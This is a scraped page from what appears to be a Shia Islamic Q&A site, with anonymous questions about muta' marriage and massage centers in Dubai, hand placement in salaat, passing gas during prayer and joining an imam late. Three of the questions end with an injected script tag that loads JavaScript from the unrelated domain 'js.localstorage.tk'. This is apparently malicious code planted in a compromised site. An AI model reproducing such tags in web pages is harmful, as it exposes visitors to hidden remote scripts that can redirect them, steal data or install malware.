Muta'

Submitted by Anonymous on Mon, 08/18/2014 - 05:21

Salam alaikum,

I am living Dubai. There are many massage centers out here. There are women who massage men. These women are mostly from far east and therefore are not muslim or christian. The Shia men here go for a massage saying they do Muta'. Is this permisible?

Appreciate your reply

Placing of Hands during Salaat

Submitted by Anonymous on Tue, 08/12/2014 - 20:55

Salaam,
I have question about the placing of hands during salaat, I understand that men have to place their hands by their side, is this also the case for women, my wife said she has read a book by Ayatollah Khomeini that has ladies pictured with hands on their bosom during salaat,
Could you please clarify what is correct.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

3) What is the definition of passing gas in salaah? Does it need to make a sound, or have a smell or not necessarily? Why I ask is that often we feel like passing gas but try to suppress it. After the suppression it is often not clear whether we have indeed passed gas or not.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

2) If I join the Imam for salaah after the second rakaat, third/fourth rakaah (during tasbeehate arbaa), it will be my first rakaah and I begin to recite my surahs but the imam moves onto ruku not leaving me enough time to complete my surahs. What do I have to do? <script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
